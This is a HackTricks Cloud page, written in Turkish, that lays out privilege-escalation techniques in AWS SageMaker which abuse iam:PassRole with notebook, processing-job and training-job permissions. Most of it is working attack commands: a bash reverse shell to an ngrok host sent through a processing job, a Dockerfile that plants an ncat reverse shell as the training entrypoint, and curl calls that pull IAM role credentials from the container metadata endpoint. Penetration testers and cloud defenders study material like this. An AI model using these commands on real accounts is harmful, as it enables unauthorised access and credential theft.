AWS - Sagemaker Privesc

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

`iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`

Bağlı olduğu IAM Rolü ile bir not defteri oluşturmaya başlayın:

aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>

Yanıt, yeni oluşturulan defter örneğinin ARN'sini içerecek NotebookInstanceArn alanını içermelidir. Ardından, defter örneğine erişmek için hazır olduğunda kullanabileceğimiz bir URL oluşturmak için create-presigned-notebook-instance-url API'sini kullanabiliriz:

aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>

Tarayıcı ile URL'ye gidin ve sağ üstteki `Open JupyterLab`` butonuna tıklayın, ardından “Launcher” sekmesine kaydırın ve “Other” bölümünde “Terminal” butonuna tıklayın.

Artık IAM Rolünün metadata kimlik bilgilerine erişmek mümkündür.

Olası Etki: Belirtilen sagemaker hizmet rolüne privesc.

`sagemaker:CreatePresignedNotebookInstanceUrl`

Eğer üzerinde Jupyter notebook'ları zaten çalışıyorsa ve bunları sagemaker:ListNotebookInstances ile listeleyebiliyorsanız (veya başka bir şekilde keşfedebiliyorsanız). Onlar için bir URL oluşturabilir, erişebilir ve önceki teknikte belirtildiği gibi kimlik bilgilerini çalabilirsiniz.

aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>

Olası Etki: Bağlı olan sagemaker hizmet rolüne privesc.

`sagemaker:CreateProcessingJob,iam:PassRole`

Bu izinlere sahip bir saldırgan, sagemaker'ın bir processingjob yürütmesini sağlayabilir ve buna bağlı bir sagemaker rolü ekleyebilir. Saldırgan, AWS yönetimli ECS hesap örneğinde çalıştırılacak konteynerin tanımını belirtebilir ve bağlı IAM rolünün kimlik bilgilerini çalabilir.

# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds

Olası Etki: Belirtilen sagemaker hizmet rolüne privesc.

`sagemaker:CreateTrainingJob`, `iam:PassRole`

Bu izinlere sahip bir saldırgan, bir eğitim işi oluşturabilecek, üzerinde rastgele bir konteyner çalıştırarak ona bağlı bir rol ile. Bu nedenle, saldırgan rolün kimlik bilgilerini çalabilecektir.

Bu senaryo, önceki senaryodan daha zor istismar edilebilir çünkü rev shell veya kimlik bilgilerini doğrudan saldırgana gönderecek bir Docker imajı oluşturmanız gerekiyor (eğitim işinin yapılandırmasında bir başlangıç komutu belirtemezsiniz).

# Create docker image
mkdir /tmp/rev
## Note that the trainning job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest

# Create trainning job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

#To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer

Potansiyel Etki: Belirtilen sagemaker hizmet rolüne privesc.

`sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`

Bu izinlere sahip bir saldırgan, bir hiperparametre eğitim işi oluşturma yeteneğine (potansiyel olarak) sahip olacaktır, üzerinde rastgele bir konteyner çalıştırarak ve ona bir rol ekleyerek. &#xNAN;I zaman eksikliği nedeniyle istismar etmedim, ancak önceki istismarlarla benzer görünüyor, istismar detaylarıyla bir PR göndermekten çekinmeyin.

Referanslar

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - S3 Privesc NextAWS - Secrets Manager Privesc

Last updated 3 days ago